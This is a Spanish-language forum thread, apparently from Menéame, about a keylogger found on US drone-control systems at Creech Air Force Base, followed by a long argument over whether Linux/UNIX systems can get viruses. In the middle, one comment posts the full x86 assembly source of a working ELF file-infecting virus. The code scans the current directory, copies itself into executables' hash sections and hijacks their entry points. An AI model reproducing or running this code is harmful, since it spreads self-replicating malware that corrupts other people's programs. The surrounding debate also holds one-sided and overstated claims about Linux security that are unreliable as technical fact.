Los expertos militares en seguridad no están seguros si este keylogger entró en sus sistemas de manera intencionada o por un accidente, de hecho, tampoco están seguros del alcance que ha podido tener y si ha extendido a otros sistemas fuera de la base pero sí que tienen la certeza que ha alcanzado sistemas con información crítica (información clasificada) y sistemas no críticos de la Base Aérea de Creech. "Intentamos eliminarlo pero, al final, vuelve de nuevo. Creemos que el virus es benigno pero, por ahora, no sabemos mucho".
|
etiquetas: virus infecta , vehículos aéreos , no tripulados , ee.uu. , keylogger 
(Remembering Donuts)
www.youtube.com/watch?v=GChYc42Sh1g
Otra cosa son los virus. Eso si que no es posible. Pero keyloggers, rootkits y troyanos si se pueden meter. Es muy difícil en un sistema bien administrado, a no ser que alguien con permisos de root lo haga desde dentro. Pero es posible.
Te imaginas que Windows liberase el código fuente
Esto nos da una idea de en manos de quien estamos.
La realidad: la arquitectura y el sistema de distribución de linux dificulta enormemente la extensión de los virus. La atención a las cuestiones de seguridad son impresionantemente mucho mejores en las empresas/fundaciones que se dedican al linux que la media general. La información, técnicas y herramientas de defensa están mucho más desarrolladas.
En cambio los "blancos" que corren con linux son mucho más apetecibles.
Al menos así entiendo y su comentario, leyendo los anteriores.
hak5.org/episodes/episode-401-wi-fi-pineapples
¿Seguro que no quieres reformular esa afirmación tan categórica?
."LOL WAT?
Y lo de seguir las indicaciones de la web de Kaspersky, y al no funcionar instalar el sistema de nuevo... Enserio, que nivel tienen los informáticos?
A lo largo de esos años, he administrado decenas de máquinas y todavía lo hago aunque menos. Y nunca he tenido que hacer frente a ningún caso en que alguien lograra introducir un "virus" en un PC corriendo un OS tipo UNIX. He visto logs enteros llenos de intentos de escalar privilegios, colar algún troyano y también mucho código maligno programado con Visual Basic perdido en algún directorio del sistema
Nada que pudiese "infectar" y replicarse dentro de un sistema tipo UNIX. Puede que algún día alguien con suficientes conocimientos, tiempo y ganas; decida escribir un programa con las características de lo que normalmente se conoce como "virus"; para sistemas tipo UNIX. Cuando esto ocurra, de hecho ya se han hecho pruebas para atacar este tipo de sistemas y probar su fortaleza en este campo; para meterlo en una máquina habrá que contar con la connivencia de un administrador que tenga suficientes privilegios para meter semejante código desde dentro. Yo no conozco a ninguno que pudiese prestar a semejante cosa. Pero puede que exista.
De momento, desde que yo puedo responder, 1987-2011, no hay código maligno escrito para sistemas tipo UNIX que se pueda definir como "virus".
Un saludo cordial
%macro movb 2
%if %2 == 0
xor %1, %1
%else
push byte %2
pop %1
%endif
%endmacro
BITS 32
CPU 486
global _start
_start: push strict dword fake_host
pusha
enter 268,0 ; sizeof(dirent)
push '.'
mov ebx, esp
movb eax, 5
movb ecx, 0
int 0x80
or eax, eax
js .vr
xchg eax, ebx
.rd: mov ecx, esp
movb eax, 89
int 0x80
dec eax
jz infect
.vc: movb eax, 6
int 0x80
.vr: leave
popa
ret
infect: pusha
mov al, 5
lea ebx, [esp + 32 + 10] ; d_name
movb ecx, 2
int 0x80
or eax, eax
js .ir
xchg eax, ebx
movb eax, 19
mov edx, ecx
sub ecx, ecx
int 0x80
xchg eax, edx
pusha
mov ecx, edx
mov edi, ebx
mov al, 192
xor ebx, ebx
movb edx, 3
movb esi, 1
xor ebp, ebp
int 0x80
mov [esp + 28], eax
bswap eax
inc ax ; > 0xffff0000
popa
jz .ic
xchg eax, esi
mov eax, dword [esi] ; ? 0x464c457f
xor eax, dword [esi + 16] ; ? 0x00030002
add eax, 0xb9b0ba83
jnz .iu
mov edi, [esi + 32] ; e_shoff
add edi, esi
movzx ecx, word [esi + 48] ; e_shnum
.hl: cmp dword [edi + 4], 5 ; sh_type == SHT_HASH
je .fh
add edi, 40
loop .hl
.iu: push ebx
mov al, 91
mov ebx, esi
mov ecx, edx
int 0x80
pop ebx
.ic: movb eax, 6
int 0x80
.ir: popa
jmp _start.rd
.fh: mov cl, _size ; even bash has 30 sections
cmp ecx, [edi + 20] ; sh_size
ja .iu
mov ebp, [edi + 16]
add ebp, esi
mov eax, [ebp] ; already infected?
dec eax
jz .iu
pusha
cld
mov edi, ebp
movb eax, 1
stosd
dec eax
stosd
stosd
mov esi, strict dword _start
_self equ $-_start-4
rep movsb
popa
mov eax, [esi + 24] ; e_entry
mov [ebp + 13], eax ; save old entry
mov eax, [edi + 12] ; sh_addr
lea eax, [eax + 12]
mov [ebp + 12 + _self], eax
mov [esi + 24], eax ; e_entry
jmp .iu
_size equ $-_start
fake_host: mov eax,1
int 0x80
Esta noticia es una mierda, militares mirando la pagina de kaspersky para quitar un virus y como no pueden formatean... mezclan conceptos, en fin, una no noticia.
Por cierto, la noticia es altamente
Lo que desanima a cualquier programador de virus es la diversidad de sistemas distintos basados en linux y la dificultad de hacer un virus que pueda actuar de forma masificada, es decir, ser capaz de introducirse a muchos sistemas a la vez con poco esfuerzo.
La popularidad de distribuciones como Ubuntu o Android, que facilitan esa estandarización, incentivarán sin duda la creación de virus para estos sistemas.
De hecho tanto es así que tu afirmación a día de hoy ya es falsa, existiendo un software malicioso categorizado como "virus" para los sistemas Android, basados en Linux: www.meneame.net/story/inteco-alerta-virus-moviles-android-incluso-hace
Es triste que sigamos repitiendo los errores que se cometieron con Firefox, vendiéndolo de forma errónea como la solución a los problemas de seguridad en la navegación. La popularidad del navegador, en parte conseguida por esa desinformada afirmación, hizo que fuera atractivo para los atacantes y empezase a ser usado para poner en riesgo el equipo aprovechando los fallos de éste.
www.meneame.net/story/zeus-empieza-atacar-usuarios-firefox
www.meneame.net/story/mozilla-desactiva-dos-extensiones-para-firefox-c
www.meneame.net/story/el-virus-que-ataca-a-firefox
#30 #34 #36 Con SeLinux olvídate de los permisos normales, éste sistema está preparado para uso militar y no lo tumbas ni con un ejército de crackers rusos .
es.wikipedia.org/wiki/SELinux
Los virus no atacan a los sistemas bien administrados que están detrás de cortafuegos profesionales, con los últimos parches de seguridad, con los servicios no necesarios desactivados, con una buena política de usuarios y contraseñas, etc.
Los virus atacan lo que es fácil, mientras haya suficientes sistemas que se puedan atacar el virus ya habrá conseguido su cometido.
Y pretender afirmar que "no es posible" que haya sistemas linux desactualizados, inseguros y mal administrados es una barbaridad.
"Los virus no atacan a los sistemas bien administrados que están detrás de cortafuegos profesionales, con los últimos parches de seguridad, con los servicios no necesarios desactivados, con una buena política de usuarios y contraseñas, etc."
Si esos sistemas son Windows, si les atacan. Si es cualquier otro es muy difícil, y si es Linux bien protegido es prácticamente imposible.
#26 Si inutiliza el armamento, entonces puede decirse que es benigno.
Sin duda la incentivarán. Pero yo no te hablaba de Android, ni de otras cosas "basadas" en *Linux. Ni de Firefox, que aunque sea software libre y de código abierto, no es un OS *Linux, sino un navegador "multiplataforma" al que, por cierto, si está instalado en un OS Windows yo no respondería de su seguridad.
Céntrate fratre ¡¡ no me pongas links que no tienen nada que ver con sistemas operativos tipo UNIX... Muéstrame enlaces en los que alguien demuestre que ha sido capaz de introducir un "virus" (código maligno con capacidad de replicarse y esconderse por cualquier parte del sistema) en un OS tipo UNIX (certificado como tal). Es decir: Slackware (funcionando desde 1993); Debian (funcionando desde 1993); Red Hat (funcionando desde 1994); Mac OS X (desde que es un UNIX certificado)...
Yo te hablo de mi experiencia desde 1994/1995 con Unixware, FreeBSD, y algunos OS *Linux. De qué experiencias me hablas tu ?? De unos cuantos enlaces en los que aparecen cosas que nada tienen que ver con sistemas tipo UNIX certificados ?? (POXIS) es.wikipedia.org/wiki/POSIX
Y ya que nombras Ubuntu... dado que esta distribución está basada en GNU/Debian Linux y si está certificada. Muéstrame un enlace en el que alguien demuestre que ha sido capaz de infectar con un "virus" una máquina corriendo Ubuntu.
Por cierto "Decir que "no es posible" es una falsedad"; esta frase, puedes calificarla como una exageración, si te apetece. Yo la escribí como propósito general, puesto que aún no ha sido posible. Decir que es una falsedad implica que debes demostrar lo contrario a lo que yo te demuestro hasta el día de hoy. De lo contrario sólo es un insulto, equivale a decir que miento sin demostrar donde miento.
Una saludo cordial
Estudiar historia en el futuro va a ser más divertido que cuando nosotros lo hicimos en el colegio.
Según una filtración, primero habrían recurrido a los consejos de la web de Kaspersky pero, al no funcionar, habrían optado por el borrado de los discos duros usando BCWipe y, posteriormente, reinstalar el sistema desde cero.
Supongo que antes de eso, probaron el reiniciar de toda la vida, que tampoco funcionó.
Si cada vez que aparece un problema de seguridad en un sistema *NIX decides acotar mejor la lista para excluirlo, como en el caso de Androiod, es evidente que en esa lista, por definición, jamás habrá amenazas de seguridad.
Y respecto a Firefox deberías comprender que era una analogía para comprender a donde nos lleva el fanatismo sin base, ignorando factores esenciales como la popularidad para analizar la seguridad.
Lo que tu no puedes pretender es que yo considere que Android es una distribución Linux, porque no lo es. O que Firefox es Linux porque tampoco lo es.
Simplemente, dejando aun lado los cientos o miles de dispositivos que incluyen el kernel Linux (o sin dejarlo a un lado); pon un link que demuestre que un OS *Linux o un OS tipo UNIX o el kernel Linux o el kernel de cualquier distribución BSD; hayan sido "infectados por un virus", entendiendo virus como: código maligno con capacidad de reproducirse y esconderse dentro de un sistema operativo...
Hay miles de routers con Linux (probablemente tengas uno); miles de dispositivos electrónicos (incluidas tostadoras), que llevan algún tipo de firmware Linux. No voy a extender mi afirmación a todos ellos. Pero aún así, y ya que me acusas de "falsedad"; deberías demostrar que lo que dije es falso. Y aún sigo esperando que lo hagas...
Respecto a los virus en Linux seguro que encuentras excusas para seguir aferrándote al dogma de que "no es posible" pero en la misma Wikipedia tienes una lista de unos cuantos software maliciosos catalogados como virus. Sin duda encontrarás alguno que cumpla incluso con tu surrealista nivel de exigencia que estás demostrando:
en.wikipedia.org/wiki/Linux_malware#Viruses_and_trojan_horses
Para que no te canses te cito directamente este: www.securelist.com/en/descriptions/old21734
The viral part works by attaching itself to normal ELF executables, patching their header, and moving the entrypoint to the viral code.
Aunque seguro que tu definición de virus se puede adaptar para que eso no lo sea, ni el próximo de la lista ni el siguiente. Total, los de Kapersky se inventan la existencia de virus para entornos *NIX para no perder cuota de mercado.
Es triste porque ya te he dado al principio la oportunidad de modificar tu categórica y por lo tanto absurda y errónea afirmación por una más moderada en la que todos estaríamos de acuerdo. Como indicar que en entornos *NIX los virus no tienen presencia o que la complejidad de su creación no es rentable para los atacantes. Pero no, has preferido aferrarte a defender lo indefendible por no se sabe que razones. Como si la posibilidad técnica de virus en un entorno informático fuese motivo suficiente para dejar de usarlos o algo parecido, una ofensa que por lo visto es inadmisible cuando hablamos de entornos *NIX.
En fin.
¿Como sabes que el virus no ha dado o pueda llegar a dar el control de los aparatejos esos a quién no debe tenerlo (Al Qaeda y amiguitos,por ejemplo)?
Bueno, me callo ya, no quiero seguir dando ideas.
A ver hombre... desde mi comentario #5 vengo defendiendo el 90% de lo que dices en tus comentarios.
En los comentarios #7 y #12 defiendo precisamente este principio al que te refieres: "Como indicar que en entornos *NIX los virus no tienen presencia o que la complejidad de su creación no es rentable para los atacantes".
En el comentario #28 ya dije: "No te la tomes como "categórica", sólo es una apreciación personal Yo uso UNIX desde siempre, sobre todo Unixware y FreeBSD y desde 1994/1995, básicamente Slackware Linux, Debian y ocasionalmente Red Hat". Y esas son las razones. Mis razones y las de muchos que desde hace años conozco en el ecosistama *UNIX. Que no pretendo sean universalmente adoptadas
No me interesa lo que diga Kapersky, ni McAfee, Norton o cualquier otro fabricante de código antivirus. Ellos viven de Windows y yo no uso ese tipo de sistemas. En 1999 yo trabajaba para una compañía que desarrollaba una distribución Linux basada en Debian que se vendía bien con algunos programas portados a Linux por IBM. Y llegaron los de Panda con un proyecto que tenían en pleno desarrollo para que incluyéramos un antivirus en los servidores Sendmail y Samba, porque según ellos; contribuían a diseminar código maligno hacia las PC con Windows que se conectaban a este tipo de servidores de correo y ficheros/impresoras...
Les escuchamos pacientemente... enviamos el código que habían escrito a IBM para que nos diesen otra opinión (IBM entonces trabajaba mucho con sistemas Windows). Y nos contestaron con algo que ya sabíamos: "no es posible implementar este código en *Linux porque exige que haya código residente en el kernel y eso, aparte de que nunca* va a ser aceptado por la gente que lo mantiene ni por el mismo Linus Torbalds; supone un elemento de inseguridad mucho mayor del que se pretende evitar. Los antivirus que los vendan a quienes los necesiten". Fin de las conversaciones
Finalmente si existen antivirus para monitorear servidores Sendmail y Samba y proteger a las máquinas Windows que se conectan a ellos: www.clamav.net/lang/en/ este es uno de ellos. Pero no no protege a Linux, protege a las máquinas con OS Windows que se conectan a servidores Linux.
Pero si lo que quieres es que te pida perdón por utilizar una frase como "eso no es posible" en el sentido de generalizar algo que, de momento es un hecho... pues tampoco hay problema:
Mis más sinceras disculpas. Lamento que mi experiencia con sistemas tipo UNIX te haya molestado tanto. No la escribí para molestar a nadie. Sólo era una apreciación personal.
Saludos cordiales
-Tranquilos, no hay nadie al teclado.
en.wikipedia.org/wiki/Agent.AWF
Sistemas afectados:
Windows 98
Windows 98 SE
Windows NT
Windows ME
Windows 2000
Windows XP
Windows Server 2003
Para que seguir...
Al virus este le pondría Manning, vamos, para tocarles las pelotas un rato.